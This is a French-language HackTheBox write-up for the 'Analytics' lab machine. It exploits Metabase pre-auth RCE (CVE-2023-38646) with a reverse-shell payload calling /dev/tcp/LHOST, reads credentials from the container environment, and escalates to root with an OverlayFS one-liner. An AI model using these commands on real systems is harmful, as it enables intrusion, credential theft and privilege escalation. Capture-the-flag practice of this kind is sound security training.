HackTheBox CVE Metabase Container Escape OverlayFS
HTB - Analytics
Exploitation Metabase pré-auth RCE via CVE-2023-38646, escalade via overlayfs dans un conteneur.
2024-02-01 Easy HackTheBox
Reconnaissance
ping 10.10.11.233
nmap -p- --open -v -sV 10.10.11.233Ports ouverts :
- 22/tcp — SSH OpenSSH 8.9p1 Ubuntu
- 80/tcp — HTTP nginx 1.18.0
# /etc/hosts
10.10.11.233 analytical.htb
10.10.11.233 data.analytical.htbExploitation — CVE-2023-38646
Metabase pré-authentification RCE. Récupération du setup token :
http://data.analytical.htb/api/session/properties
→ setup-token: "249fa03d-fd94-4d5b-b94f-b4ebf3df681f"nc -nlvp 4444
python3 main.py -u http://data.analytical.htb \
-t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f \
-c "bash -i >& /dev/tcp/LHOST/4444 0>&1"Post-exploitation
Extraction des credentials depuis les variables d’environnement du conteneur :
cat /proc/self/environmetalytics:An4lytics_ds20223#ssh metalytics@analytical.htb
cat user.txtPrivilege Escalation — Container Escape
uname -a
# Linux analytics 6.2.0-25-genericExploitation OverlayFS (CVE-2023-0386) :
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; \
setcap cap_setuid+eip l/python3; \
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && \
touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
cat /root/root.txt